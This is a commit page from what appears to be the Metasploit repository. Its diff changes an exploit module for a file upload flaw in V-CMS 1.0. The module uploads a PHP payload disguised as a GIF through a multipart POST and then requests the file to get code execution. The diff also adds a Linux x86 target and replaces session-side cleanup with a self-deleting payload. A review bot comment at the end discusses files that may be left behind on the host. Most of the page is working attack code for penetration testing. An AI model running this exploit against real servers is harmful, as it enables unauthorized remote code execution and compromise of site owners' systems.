
Commit db12413

committed
Convert vcms_upload to use PhpEXE
Incidentally adds a Linux x86 target
1 parent 13a5892 commit db12413

1 file changed

+8
-24
lines changed

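--- a/modules/exploits/linux/http/vcms_upload.rb
+++ b/modules/exploits/linux/http/vcms_upload.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking
 
 include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::PhpEXE
 
 def initialize(info={})
 super(update_info(info,
@@ -28,8 +29,8 @@ def initialize(info={})
 'License' => MSF_LICENSE,
 'Author' =>
 [
-'AutoSec Tools', #Initial discovery
-'sinn3r' #Metasploit
+'AutoSec Tools', # Initial discovery
+'sinn3r' # Metasploit
 ],
 'References' =>
 [
@@ -42,15 +43,12 @@ def initialize(info={})
 {
 'BadChars' => "\x00",
 },
-'DefaultOptions' =>
-{
-'EXITFUNC' => "none"
-},
 'Platform' => 'php',
 'Arch' => ARCH_PHP,
 'Targets' =>
 [
-['V-CMS 1.0', {}],
+[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
 ],
 'Privileged' => false,
 'DisclosureDate' => "Nov 27 2011", #When the ticket was created
@@ -75,34 +73,20 @@ def check
 end
 end
 
-def on_new_session(client)
-if client.type == "meterpreter"
-client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
-client.fs.file.rm(@payload_name)
-else
-client.shell_command_token("rm #{@payload_name}")
-end
-end
-
 def exploit
 peer = "#{rhost}:#{rport}"
 
 base = target_uri.path
 base << '/' if base[-1,1] != '/'
 
 @payload_name = "#{rand_text_alpha(5)}.php"
-p = %Q|<?php
-#{payload.encoded}
-?>
-|
-
-p = p.gsub(/^\t\t/, '')
+p = get_write_exec_payload(:unlink_self=>true)
 
 post_data = "------x\r\n"
 post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n"
 post_data << "Content-Type: image/gif\r\n"
 post_data << "\r\n"
-post_data << p
+post_data << p + "\r\n"
 post_data << "------x--\r\n"
 
 print_status("#{peer} Uploading payload: #{@payload_name}")
@@ -133,4 +117,4 @@ def exploit
 
 handler
 end
-end
+end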
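Review bot: Removal of the uploaded file now rests only on `:unlink_self=>true` in the `@@ -75,34 +73,20 @@` hunk, because the session-side cleanup in `on_new_session` is deleted and the visible part of `exploit` neither documents that nor reports when the file may have been left behind. A comment above the call, e.g. `# cleanup is delegated to the PhpEXE stub (unlink_self); no session-side removal`, would record the decision. A status line naming `@payload_name` when the upload or the follow-up request fails would let the tester remove the file by hand and list it in the report; a leftover script in the upload directory stays reachable to anyone. For the new Linux x86 target the mixin presumably also writes a native executable on the host, and whether that second file is removed is not visible on this page and should be confirmed. `exploit` continues outside the hunk, so its request and error handling could not be checked.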
